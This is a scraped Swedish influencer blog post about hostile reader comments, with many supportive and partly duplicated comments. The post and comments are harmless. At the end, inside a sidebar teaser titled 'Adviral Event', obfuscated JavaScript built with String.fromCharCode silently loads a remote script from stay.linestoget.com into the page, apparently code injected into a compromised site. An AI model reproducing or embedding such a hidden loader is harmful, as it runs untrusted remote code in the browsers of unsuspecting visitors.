Hur ska vi ändra atmosfären i kommentarsfältet?

 

29FD85C1-83DC-442A-A8E1-497841925636

Men hallå?

Tränar jag så är det fel, tränar jag inte så är det fel🤣

Går jag upp i vikt så är jag ”ful, fet och misslyckad” Går jag ner i vikt så är jag ful, desperat och manisk”

-Vad är det frågan om?!

Ger jag en rabattkod så är det fel, ger jag INTE en rabattkod så frågar ni efter det…🤷🏼‍♀️😅

oavsett VAD jag gör så VET jag att jag inte kan vara alla till lags. Det förlikade jag mig med för längesen.

Jag är på en plats i livet där jag mår bra. Bättre än på många år. Jag känner mig starkare, piggare, gladare, lugnare och mer harmonisk!❤️💪🏻👊🏻

Med en glädje över en kropp som äntligen ”svarar”, full med energi och en lättnad över att MÅ bra igen 🙏🏻💫

-Detta retar vissa. Väldigt mycket!

VARFÖR ska man sitta och kritisera detta i mitt kommentarsfält? Varför ska man försöka leta fel, och bara föröka se det negativa i allt?

-Så onödigt! 😎🤷🏼‍♀️🙈

Jag är mamma! Jag har ett ansvar. Barnen gör inte som vi säger, dom gör som vi GÖR!

Tänk på det innan ni sitter där och kommenterar elakt/negativt bakom skärmarna… föregå med GOTT exempel!🙏🏻

Nivån här inne sista dagarna?!😅 tjafsa om att jag äter ägg? Att det är hönans mens?! WTF? Vad är det för fel på folk?

5F0B823D-A542-47E3-B5B4-2A076CC737F9 93992730-0A65-47BE-8688-153680195774

Nu menar jag inte att alla ska ta åt sig…. Jag menar bara att det är några få här inne som tar väldigt mycket onödig plats i mitt kommentarsfält….. Förr så kommenterade man mycket mer. Idag är det inte så längre. Många kommunicerar via instagram, händelser och IG-direkt. Det är lättare.

Så därför är jag mån om att snabbast möjligt ändra atmosfären här inne. Jag vill att ni ska kunna kommunicera med varandra. Peppa, lyfta och sprida  lite gemenskap här inne!

-HUR ska vi komma dit? ❤️🙏🏻

 

 

f

54 Komentarer

 1. Hej My! Gillar din blogg och läser varje dag, även om jag är 45+ och har större barn o helt annat liv än du ? så är det ändå inspirerande. Skulle du rekommendera att äta ägg till frukost, även om man inte tränar jättemycket? (tränar varje dag, antingen cardio eller yoga). Min man ääälskar ägg och äter typ äggröra osv varje dag ? men det är inte riktigt jag. Däremot att äga äggvitor skulle jag kunna göra, om det är nyttigt och hjäper till att bygga muskler? jag tror jag är på väg in in pre-menopaus för har utan anledning gått up ca 3 kg och det känns väldigt trist såhär före sommaren. Låter inte så mycket för andra men själv märker man ju det och känner det jättemycket. Tack för bra blogg!

 2. Hej My! Gillar din blogg och läser varje dag, även om jag är 45+ och har större barn o helt annat liv än du 🙂 så är det ändå inspirerande. Skulle du rekommendera att äta ägg till frukost, även om man inte tränar jättemycket? (tränar varje dag, antingen cardio eller yoga). Min man ääälskar ägg och äter typ äggröra osv varje dag 🙂 men det är inte riktigt jag. Däremot att äga äggvitor skulle jag kunna göra, om det är nyttigt och hjäper till att bygga muskler? jag tror jag är på väg in in pre-menopaus för har utan anledning gått up ca 3 kg och det känns väldigt trist såhär före sommaren. Låter inte så mycket för andra men själv märker man ju det och känner det jättemycket. Tack för bra blogg!

 3. Hej fina My,
  Sånt tjafs som du beskriver är nog tyvärr svårt att undvika.
  Det är så lätt idag att sitta vid en skärm och vara lite väl otrevlig.
  Ett trist beteende som man ser på alla möjliga ställen, inte bara här.
  Mycket är ren avundsjuka / svartsjuka, tror jag.
  Jag kan självklart ha fel.
  Kanske att kommentarerna ska granskas innan dom syns här.. ?
  Då blir det ju inte lika ”kul” att vara otrevlig, tänker jag.
  Visst alla har rätt att säga vad dom tycker, nästan, men lite gräns har man väl ändå..
  Kram från mig ?

 4. Ja dumma kommentarer får du nog räkna med när du bloggar.När man sitter hemma bakom sin skärm är det nog lätt att kritisera.
  Det är ju så att alla har olika meningar om vad du skriver.
  Jag sälv gillar inte att du skriver ” ska berätta senare” eller liknande. Strunta i att skriv vad du tänker berätta senare, håll dig till det aktuella. Annars gillar jag dig och din blogg.
  Kram

 5. Vissa kvinnors avundsjuka har jag varit utsatt för hela mitt liv! Det försvinner inte, avundsjuka hos dessa människor är en indikation på väldigt väldigt låg självkänsla, en känsla av att man inte duger som man är. Till och med min egen mamma har varit avundsjuk på mig…
  När man då ser en vacker kvinna, som mår bra då vill man ha det hon har. Vad dessa avundsjuka bittra kvinnor inte förstår är att det inte går att bli någon annan. Man får göra det bästa av vad man har, försöka bli den bästa versionen av sig själv, men tyvärr har alla inte den insikten eller orken.
  Jag tror du får förlika dig med att du, med ditt snygga yttre, alltid kommer väcka en avundsjuka hos vissa kvinnor. Det ärbara så.
  Du är tydligen ett hot ?

 6. Tycker du fortsätter som du gör. Idioterna kommer finnas kvar ändå. Så ingen ide att försöka anpassa. Jag personligen tycker att man inte ska släppa igenom korkade och elaka kommentarer. Överhuvudtaget. Dom fyller liksom ingen funktion. Tycker inte att någon blogg blir mer levande och ärlig om vem som helst kan skriva vad som helst. Drar bara ner meningen med vad man vill förmedla.
  Varför all denna jävla kritik oavsett om den är konstruktiv? Ytterst sällan som människor springer runt i riktiga livet och rapar fram konstruktiv kritik i tid och otid.
  Skillnad är ju så klart om man ställer en fråga eller vill ha en disskution om något ämne. Men annars…? Nä…har nästan slutat att läsa både bloggar och framför allt kommentarerna. Får bara en oskön känsla i kroppen.
  Lycka till med ditt företag och träningen??Du är jätteduktig?❤️

 7. Hej fina My,
  Sånt tjafs som du beskriver är nog tyvärr svårt att undvika.
  Det är så lätt idag att sitta vid en skärm och vara lite väl otrevlig.
  Ett trist beteende som man ser på alla möjliga ställen, inte bara här.
  Mycket är ren avundsjuka / svartsjuka, tror jag.
  Jag kan självklart ha fel.
  Kanske att kommentarerna ska granskas innan dom syns här.. 🤔
  Då blir det ju inte lika ”kul” att vara otrevlig, tänker jag.
  Visst alla har rätt att säga vad dom tycker, nästan, men lite gräns har man väl ändå..
  Kram från mig 🤗

 8. Ja dumma kommentarer får du nog räkna med när du bloggar.När man sitter hemma bakom sin skärm är det nog lätt att kritisera.
  Det är ju så att alla har olika meningar om vad du skriver.
  Jag sälv gillar inte att du skriver ” ska berätta senare” eller liknande. Strunta i att skriv vad du tänker berätta senare, håll dig till det aktuella. Annars gillar jag dig och din blogg.
  Kram

 9. Vissa kvinnors avundsjuka har jag varit utsatt för hela mitt liv! Det försvinner inte, avundsjuka hos dessa människor är en indikation på väldigt väldigt låg självkänsla, en känsla av att man inte duger som man är. Till och med min egen mamma har varit avundsjuk på mig…

  När man då ser en vacker kvinna, som mår bra då vill man ha det hon har. Vad dessa avundsjuka bittra kvinnor inte förstår är att det inte går att bli någon annan. Man får göra det bästa av vad man har, försöka bli den bästa versionen av sig själv, men tyvärr har alla inte den insikten eller orken.

  Jag tror du får förlika dig med att du, med ditt snygga yttre, alltid kommer väcka en avundsjuka hos vissa kvinnor. Det ärbara så.

  Du är tydligen ett hot 🙂

 10. Tycker du fortsätter som du gör. Idioterna kommer finnas kvar ändå. Så ingen ide att försöka anpassa. Jag personligen tycker att man inte ska släppa igenom korkade och elaka kommentarer. Överhuvudtaget. Dom fyller liksom ingen funktion. Tycker inte att någon blogg blir mer levande och ärlig om vem som helst kan skriva vad som helst. Drar bara ner meningen med vad man vill förmedla.
  Varför all denna jävla kritik oavsett om den är konstruktiv? Ytterst sällan som människor springer runt i riktiga livet och rapar fram konstruktiv kritik i tid och otid.
  Skillnad är ju så klart om man ställer en fråga eller vill ha en disskution om något ämne. Men annars…? Nä…har nästan slutat att läsa både bloggar och framför allt kommentarerna. Får bara en oskön känsla i kroppen.
  Lycka till med ditt företag och träningen👍🏻Du är jätteduktig😍❤️

 11. Tycker att du har en jättefin kvinnlig kropp med kurvorna på rätta stället. Så de som klagar e avundsjuka på dig, that’s it?

 12. Hej!
  Tyvärr verkar det vara något som osäkra tjejer som känner sig misslyckade eller inte är glada i sin livssituation sysslar med. Bakom det här Kvinnor kan finns något att vi ska kunna men kvinnor tycker bara vi ska kunna lagom. Allt som är utanför lagom är på alla sätt fel. Istället för att som du, jag, flera tjejer tänker ”wow inspiration” så finns det för många som istället försöker sätta tjejen på plats genom att trycka ner, påpeka saker etc.
  Jag har aldrig känt de där lagomvibbarna från killar, men tjejer däremot. De som ena stunden pratar om att vi ska lyfta varandra, påpekar sedan saker som känns ungefär lika bra som ett getingstick.
  De verkar tycka att man är provocerande av saker som Jag älskar mitt jobb, eller ännu värre Jag älskar mina två jobb!
  Lagom är att man har ett jobb men gnäller lite över det och jobbar för att man måste få pengar. Och glöm inte att ha en hög lön, det vill alla ha, men den får inte vara för hög. För hög lön är inte lagom i överkant utan ses som något som aldrig går att uppnå. Säger jag att jag Älskar att träna 5-6ggr/v, då är det för mycket. Lagom är att man ler lite och går till gymmet 3ggr/v. Tar jag bort min älskade choklad, då borde jag ju ändå unna mig lite ibland… I can go on forever!!!
  Min åsikt är, antingen lyft en annan tjej eller håller man inte med var tyst.
  Kram ❤️

 13. Hej! Och först Grattis till att du mår så bra & att din träning flyter på m framgång.Det är så skönt när man hittat en rytm man kan hålla & trivas med.
  Jag tränar ju själv mycket och jobbar även med träning så jag gillar dina inlägg.
  Men jag kan även förstå att endel tycker det bli i överkant mycket med alla matbilder m din frukost /lunch etc.Vi vet ju nu vad du äter och det är en kost som endel kanske inte är så intresserade i.
  Jag tycker däremot det varit väldigt kul m recept på olika luncher du gör, innehåll av fett/protein/karbo etc.
  Det hade ifrån min sida även uppskattats att få se vad för övn ni kör på era cirkel pass och hur dom är satt ihop.
  Det kunde kanske inspirera att träna hemma el på gym en dag man är tom för idéer el bara vill ha ett färdigt upplägg.
  Så kanske du kunde byta bort några bikinibilder ( även att du är super fin i bikni) och hellre ge oss tränings pepp.
  Detta är bara förslag f min sida ! Men tror kanske att det kunde bidra till en trevligare ton här på din blogg om du ändrade lite i dina inlägg så du träffar ännu flera folk.

 14. Tycker att du har en jättefin kvinnlig kropp med kurvorna på rätta stället. Så de som klagar e avundsjuka på dig, that’s it👌

 15. Jag tror att ”många” av de som skriver härinne medvetet gör det för att irritera och få igång dig något de tycker är kul att sen läsa och skratta åt. Tror tyvärr inte att det kommer någon dialog mellan läsarna det har du efterfrågat tidigare vet jag men det verkar inte bli så. Det bästa är nog att du låter bli att gå i försvar och svara dem och he he, det blir bara värre då. Det jag undrar lite över är dock varför alla de som skriver snälla och trevliga kommentarer nu aldrig hör av sig annars var finns de när det gäller dina vanliga inlägg, det är ju de här som är ute på något som dominerar och väldigt ofta är det helt tomt.

 16. Tycker att du ska fortsätta o skriva som du gör ? det är ju din blogg o gillar inte vi läsare den, så är det ju enkelt att välja bort.
  Det är ett mönster vilka som skriver negativa kommentarer tycker jag. Alltid samma personer o aldrig något positivt. Kommentarerna är skrivna med en undermening och ’inget illa ment och i all välmening’.
  Njut av din resa ☀️

 17. Hej!
  Tyvärr verkar det vara något som osäkra tjejer som känner sig misslyckade eller inte är glada i sin livssituation sysslar med. Bakom det här Kvinnor kan finns något att vi ska kunna men kvinnor tycker bara vi ska kunna lagom. Allt som är utanför lagom är på alla sätt fel. Istället för att som du, jag, flera tjejer tänker ”wow inspiration” så finns det för många som istället försöker sätta tjejen på plats genom att trycka ner, påpeka saker etc.
  Jag har aldrig känt de där lagomvibbarna från killar, men tjejer däremot. De som ena stunden pratar om att vi ska lyfta varandra, påpekar sedan saker som känns ungefär lika bra som ett getingstick.
  De verkar tycka att man är provocerande av saker som Jag älskar mitt jobb, eller ännu värre Jag älskar mina två jobb!
  Lagom är att man har ett jobb men gnäller lite över det och jobbar för att man måste få pengar. Och glöm inte att ha en hög lön, det vill alla ha, men den får inte vara för hög. För hög lön är inte lagom i överkant utan ses som något som aldrig går att uppnå. Säger jag att jag Älskar att träna 5-6ggr/v, då är det för mycket. Lagom är att man ler lite och går till gymmet 3ggr/v. Tar jag bort min älskade choklad, då borde jag ju ändå unna mig lite ibland… I can go on forever!!!
  Min åsikt är, antingen lyft en annan tjej eller håller man inte med var tyst.
  Kram ❤️

 18. ALLA MÄNNISKOR
  -Mår inte bra
  -Är inte vänliga
  -Har inte goda avsikter
  osv, osv
  listan han göras lång
  EN DEL MÄNNISKOR
  Drivs av onda avsikter, är hotfulla, ja t o m hatiska
  Att tro annat är naivt
  Så att skapa sig en status som sk influencer med en blogg som skyltfönster för sitt liv och för sina säljkampanjer medför inte bara beundran och kärlekshjärtan.
  Utan medför också ett högt pris.
  Priset man får betala handlar om förföljelse, hot, smutskastning
  Ja t o m överfall och därmed ständig otrygghet och rädsla
  Att tro annat är naivt
  För den krassa verkligheten är, att långt ifrån alla har behov av att dyrka en influencer
  Många har precis motsatt behov; att häva ur sig sitt har och sin avsky
  Så vad kan du göra?

 19. Hej! Och först Grattis till att du mår så bra & att din träning flyter på m framgång.Det är så skönt när man hittat en rytm man kan hålla & trivas med.

  Jag tränar ju själv mycket och jobbar även med träning så jag gillar dina inlägg.
  Men jag kan även förstå att endel tycker det bli i överkant mycket med alla matbilder m din frukost /lunch etc.Vi vet ju nu vad du äter och det är en kost som endel kanske inte är så intresserade i.
  Jag tycker däremot det varit väldigt kul m recept på olika luncher du gör, innehåll av fett/protein/karbo etc.

  Det hade ifrån min sida även uppskattats att få se vad för övn ni kör på era cirkel pass och hur dom är satt ihop.
  Det kunde kanske inspirera att träna hemma el på gym en dag man är tom för idéer el bara vill ha ett färdigt upplägg.
  Så kanske du kunde byta bort några bikinibilder ( även att du är super fin i bikni) och hellre ge oss tränings pepp.

  Detta är bara förslag f min sida ! Men tror kanske att det kunde bidra till en trevligare ton här på din blogg om du ändrade lite i dina inlägg så du träffar ännu flera folk.

 20. Jag tror att ”många” av de som skriver härinne medvetet gör det för att irritera och få igång dig något de tycker är kul att sen läsa och skratta åt. Tror tyvärr inte att det kommer någon dialog mellan läsarna det har du efterfrågat tidigare vet jag men det verkar inte bli så. Det bästa är nog att du låter bli att gå i försvar och svara dem och he he, det blir bara värre då. Det jag undrar lite över är dock varför alla de som skriver snälla och trevliga kommentarer nu aldrig hör av sig annars var finns de när det gäller dina vanliga inlägg, det är ju de här som är ute på något som dominerar och väldigt ofta är det helt tomt.

 21. Tycker att du ska fortsätta o skriva som du gör 🤗 det är ju din blogg o gillar inte vi läsare den, så är det ju enkelt att välja bort.
  Det är ett mönster vilka som skriver negativa kommentarer tycker jag. Alltid samma personer o aldrig något positivt. Kommentarerna är skrivna med en undermening och ’inget illa ment och i all välmening’.
  Njut av din resa ☀️

 22. ALLA MÄNNISKOR
  -Mår inte bra
  -Är inte vänliga
  -Har inte goda avsikter
  osv, osv
  listan han göras lång

  EN DEL MÄNNISKOR
  Drivs av onda avsikter, är hotfulla, ja t o m hatiska
  Att tro annat är naivt

  Så att skapa sig en status som sk influencer med en blogg som skyltfönster för sitt liv och för sina säljkampanjer medför inte bara beundran och kärlekshjärtan.
  Utan medför också ett högt pris.

  Priset man får betala handlar om förföljelse, hot, smutskastning
  Ja t o m överfall och därmed ständig otrygghet och rädsla
  Att tro annat är naivt

  För den krassa verkligheten är, att långt ifrån alla har behov av att dyrka en influencer
  Många har precis motsatt behov; att häva ur sig sitt har och sin avsky

  Så vad kan du göra?

 23. Jag är övertygad om att den lilla klick som skriver korkade kommentarer, kommer fortsätta med det, oavsett vad du skriver om! Enbart i syfte att reta och håna dig. Vad det bottnar i? Möjligen att man inte har nåt liv, avundsjuk, enbart dum i huvudet, bitter….orsakerna är många. Tyvärr tror jag att vissa av någon otroligt märklig anledning, tycker att det är roligt att skriva skitkommentarer. Ser dock inte ett uns av det roliga i det…enbart tragiskt faktiskt.

 24. Det kallas svensk avundsjuka. Stå på dig var dig själv och gör det du vill göra, skit i alla miserabla påhoppare, de kan ju börja med att rannsaka sig själva och sen sluta läsa din blogg då de retar sig så mycket på den.
  Jag tycker du verkar vara reko!

 25. Men snälla. Blockera sjuka människor. För din egen skull och läsarnas. Det kan väll inte vara så svårt. Hela bloggen Blir förstörd om idioter får härja runt. Bara bort med dom. Kram.

 26. Jag är övertygad om att den lilla klick som skriver korkade kommentarer, kommer fortsätta med det, oavsett vad du skriver om! Enbart i syfte att reta och håna dig. Vad det bottnar i? Möjligen att man inte har nåt liv, avundsjuk, enbart dum i huvudet, bitter….orsakerna är många. Tyvärr tror jag att vissa av någon otroligt märklig anledning, tycker att det är roligt att skriva skitkommentarer. Ser dock inte ett uns av det roliga i det…enbart tragiskt faktiskt.

 27. Man får nog lära sig att sollra bort alla onödiga och otrevliga kommentarer. Mycket tyder på okunskap, avundsjuka osv. Sen är det så lätt att”gömma sig” bakom sin skärm, vilket gör att kommentarerna blir mycket råare och mer personliga, då ”man inte kan komma åt” personen ifråga på samma sätt som när man står ”öga mot öga” . Anmäl dem som behövs anmälas.
  Folk är inte nöja med varken ja el nej nu för tiden. Det är tragiskt och galet.
  Stor eloge att du orkar fortsätta trots dessa nättroll & bra att du står på dig?
  Ju fler som står emot dem, desto starkare blir man???

 28. Det kallas svensk avundsjuka. Stå på dig var dig själv och gör det du vill göra, skit i alla miserabla påhoppare, de kan ju börja med att rannsaka sig själva och sen sluta läsa din blogg då de retar sig så mycket på den.
  Jag tycker du verkar vara reko!

 29. Men snälla. Blockera sjuka människor. För din egen skull och läsarnas. Det kan väll inte vara så svårt. Hela bloggen Blir förstörd om idioter får härja runt. Bara bort med dom. Kram.

 30. Om alla ni som kommenterar nu gör det annars också på de ”vanliga” inläggen så skulle det ju göra mycket på ett snabbt och enkelt sätt.

 31. Man får nog lära sig att sollra bort alla onödiga och otrevliga kommentarer. Mycket tyder på okunskap, avundsjuka osv. Sen är det så lätt att”gömma sig” bakom sin skärm, vilket gör att kommentarerna blir mycket råare och mer personliga, då ”man inte kan komma åt” personen ifråga på samma sätt som när man står ”öga mot öga” . Anmäl dem som behövs anmälas.

  Folk är inte nöja med varken ja el nej nu för tiden. Det är tragiskt och galet.

  Stor eloge att du orkar fortsätta trots dessa nättroll & bra att du står på dig💖
  Ju fler som står emot dem, desto starkare blir man💖👌🏼

 32. Hej My,
  Följer ytterst sällan bloggar eller sociala medier. Av ngn anledning halkade jag in på din. Äntligen en mänsklig blogg där din fina medmänsklighet, öppenhet och ärlighet om hur livet faktiskt ser ut i verkligheten för de flesta av oss lyser igenom. Livet fyllt av med och motgångar. Beundrar din styrka av att öppna upp dig. Beundrar att du gör det för oss medmänniskor. Att bara göra det för den man lever med kan vara utmanande nog. Människor som uttrycker sig illa mår bevisligen inte bra. Kan tycka det är sorgligt. Sorgligt på så sätt att det visar hur många som faktiskt skulle behöva ha ditt mod men som inte har det för att må bättre. Det befogar inte dem att uttrycka sig elakt men bakom det finns säkerligen en stor ensam själ.
  Fortsätt vara du. Fantastisk inspiratör, fantastisk omtänksam och medmänsklig.
  /Johanna

 33. Erkänner att jag ibland skrivit nått knäppt för att få igång lite ”liv i luckan” i ditt kommentarsfält. Aldrig nånsin nått elakt har jag skrivit, men påpekat eller skrivit nån utstickande åsikt har jag gjort för att skapa reaktioner. Inser det är barnsligt då jag är 32 år. Förlåt mig för det. Ska sluta med sådant. All lycka och kärlek ❤.

 34. Rosor till My ❤️ som driver en härlig blogg i med och motgångar. Rosor till alla er som kommenterat idag ❤️ För det är så härligt att läsa positiva saker! Alla ni som skrivit idag har nog ett stort hjärta! Kram till er alla!

 35. Om alla ni som kommenterar nu gör det annars också på de ”vanliga” inläggen så skulle det ju göra mycket på ett snabbt och enkelt sätt.

 36. Hönans mens – WTF????din kommentar…. Gud vad jag skrattade. Love it?? ❤️
  Bara att nån skrev det ens var askul. Nån riktigt bildad. ???????
  Ju mer framgång, desto smalare osv osv. Ju värre blir vissa. Så är det bara. Avund.
  Kanske de borde borsta bort chipssmulorna från tröjan och anmäla sig till ett event istället med dig?! Just saying.
  Kämpa på supermorsan???

 37. Hej My,
  Följer ytterst sällan bloggar eller sociala medier. Av ngn anledning halkade jag in på din. Äntligen en mänsklig blogg där din fina medmänsklighet, öppenhet och ärlighet om hur livet faktiskt ser ut i verkligheten för de flesta av oss lyser igenom. Livet fyllt av med och motgångar. Beundrar din styrka av att öppna upp dig. Beundrar att du gör det för oss medmänniskor. Att bara göra det för den man lever med kan vara utmanande nog. Människor som uttrycker sig illa mår bevisligen inte bra. Kan tycka det är sorgligt. Sorgligt på så sätt att det visar hur många som faktiskt skulle behöva ha ditt mod men som inte har det för att må bättre. Det befogar inte dem att uttrycka sig elakt men bakom det finns säkerligen en stor ensam själ.
  Fortsätt vara du. Fantastisk inspiratör, fantastisk omtänksam och medmänsklig.

  /Johanna

 38. Erkänner att jag ibland skrivit nått knäppt för att få igång lite ”liv i luckan” i ditt kommentarsfält. Aldrig nånsin nått elakt har jag skrivit, men påpekat eller skrivit nån utstickande åsikt har jag gjort för att skapa reaktioner. Inser det är barnsligt då jag är 32 år. Förlåt mig för det. Ska sluta med sådant. All lycka och kärlek ❤.

 39. Rosor till My ❤️ som driver en härlig blogg i med och motgångar. Rosor till alla er som kommenterat idag ❤️ För det är så härligt att läsa positiva saker! Alla ni som skrivit idag har nog ett stort hjärta! Kram till er alla!

 40. Hönans mens – WTF😂😂😂😂din kommentar…. Gud vad jag skrattade. Love it👊🏻 ❤️
  Bara att nån skrev det ens var askul. Nån riktigt bildad. 😵😵😵😵😂😵🙈
  Ju mer framgång, desto smalare osv osv. Ju värre blir vissa. Så är det bara. Avund.
  Kanske de borde borsta bort chipssmulorna från tröjan och anmäla sig till ett event istället med dig?! Just saying.
  Kämpa på supermorsan👍🏻😘

 41. Jag tycker du ska fortsätta skriva om allt i ditt liv. Jag är inte så intresserad av just träning eller reklam för träningskläder men det
  är ditt val och din blogg. Men blandat är bra.
  Sen att få ordning i kommentarsfälten, det kommer nog inte att ske. Men vi kan väl försöka tänka till innan vi skriver. Rena elakheter bör gå bort.
  Jag skriver ibland och speciellt om jag har en annan åsikt om nåt, men inte av att jag är elak!
  Man måste få fråga och tyvärr kan ibland det skrivna se hårdare ut än det var tänkt.
  Angående detta med äggen så frågade JAG av den anledningen att jag ville veta varför du åt så många och jag fick ett klart och bra svar.
  Men den som skriver att ägget är hönans mens har nog inte läst på ordentligt. Skulle personen skrivit nåt då hade det varit bättre skriva att ägget är hönsens barn, för det är mer sant eller helt enkelt låtit bli att skriva alls.
  Jag tycker du skriver på som vanligt My, och sen tycker jag att vi som kommenterar tänker både en och två gånger innan vi skickar kommentaren.
  Man behöver verkligen inte hålla med och säga ja till allt men man behöver inte vara elak

  • Fast faktiskt så är ju hönans obefruktade ägg inte hönans barn, utan det är hönans ägglossning, precis som när vi kvinnor har mensblödning och de obefruktade äggen kommer ut via mensen. Så helt fel var inte kommentaren. Men dock onödig och äcklig ?.

     • Ja du ser Blenda, spelar ingen roll hur mycket man upplyser dessa människor som tjatar om hönans mens. Det är fullständig luft mellan öronen och man undrar hur stackarna eg har det? Troligtvis är dom/den inte medveten om hur korkade de faktiskt är och går vidare glatt i livet med idiotkommentarer ..
      Fr.o.m NU ska jag inte besvara folk som skriver så dumt. Är ju ingen mening och bloggen blir ju bara ännu mer knasig med alla (den) som hejar på o förpestar.
      Ha en skön onsdag ?

 42. Driver man en blogg som är offentlig blir man själv offentlig. Alla som har intresse av att läsa inläggen kan också göra det.
  Vårt samhälle består av ett antal miljoner individer. De flesta av oss är helt normala och sunda människor. Men här finns även brottslingar, pedofiler, våldtäktsmän, paranoida och andra psykiskt sjuka individer. Och alla kan de läsa bloggen – och kommentera inläggen.
  Bedrövliga kommentarer är bara en susning av alla de mycket allvarligare negativa konsekvenser som kan bli följden av att man visar upp sig själv och sin familj offentligt.
  De fina varma vänliga kommentarerna motverkar tyvärr inte det riskscenariot
  – eller skyddar mot det.
  Inte heller spelar det någon roll att kommentörsfältet fylls av uppmaningar som ’ att du ska vara dig själv’ ’ strunta i elakheterna’ ’ ignorera idioterna’ mm mm
  Det är som det är och kommer säkerligen att fortsätta. Och som sagt, det är nog bara toppen på isberget.
  .

 43. Jag tycker du ska fortsätta skriva om allt i ditt liv. Jag är inte så intresserad av just träning eller reklam för träningskläder men det
  är ditt val och din blogg. Men blandat är bra.
  Sen att få ordning i kommentarsfälten, det kommer nog inte att ske. Men vi kan väl försöka tänka till innan vi skriver. Rena elakheter bör gå bort.
  Jag skriver ibland och speciellt om jag har en annan åsikt om nåt, men inte av att jag är elak!
  Man måste få fråga och tyvärr kan ibland det skrivna se hårdare ut än det var tänkt.
  Angående detta med äggen så frågade JAG av den anledningen att jag ville veta varför du åt så många och jag fick ett klart och bra svar.
  Men den som skriver att ägget är hönans mens har nog inte läst på ordentligt. Skulle personen skrivit nåt då hade det varit bättre skriva att ägget är hönsens barn, för det är mer sant eller helt enkelt låtit bli att skriva alls.
  Jag tycker du skriver på som vanligt My, och sen tycker jag att vi som kommenterar tänker både en och två gånger innan vi skickar kommentaren.
  Man behöver verkligen inte hålla med och säga ja till allt men man behöver inte vara elak

  • Fast faktiskt så är ju hönans obefruktade ägg inte hönans barn, utan det är hönans ägglossning, precis som när vi kvinnor har mensblödning och de obefruktade äggen kommer ut via mensen. Så helt fel var inte kommentaren. Men dock onödig och äcklig 😖.

     • Ja du ser Blenda, spelar ingen roll hur mycket man upplyser dessa människor som tjatar om hönans mens. Det är fullständig luft mellan öronen och man undrar hur stackarna eg har det? Troligtvis är dom/den inte medveten om hur korkade de faktiskt är och går vidare glatt i livet med idiotkommentarer ..

      Fr.o.m NU ska jag inte besvara folk som skriver så dumt. Är ju ingen mening och bloggen blir ju bara ännu mer knasig med alla (den) som hejar på o förpestar.

      Ha en skön onsdag 🌸

 44. Driver man en blogg som är offentlig blir man själv offentlig. Alla som har intresse av att läsa inläggen kan också göra det.
  Vårt samhälle består av ett antal miljoner individer. De flesta av oss är helt normala och sunda människor. Men här finns även brottslingar, pedofiler, våldtäktsmän, paranoida och andra psykiskt sjuka individer. Och alla kan de läsa bloggen – och kommentera inläggen.
  Bedrövliga kommentarer är bara en susning av alla de mycket allvarligare negativa konsekvenser som kan bli följden av att man visar upp sig själv och sin familj offentligt.
  De fina varma vänliga kommentarerna motverkar tyvärr inte det riskscenariot
  – eller skyddar mot det.
  Inte heller spelar det någon roll att kommentörsfältet fylls av uppmaningar som ’ att du ska vara dig själv’ ’ strunta i elakheterna’ ’ ignorera idioterna’ mm mm
  Det är som det är och kommer säkerligen att fortsätta. Och som sagt, det är nog bara toppen på isberget.
  .

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/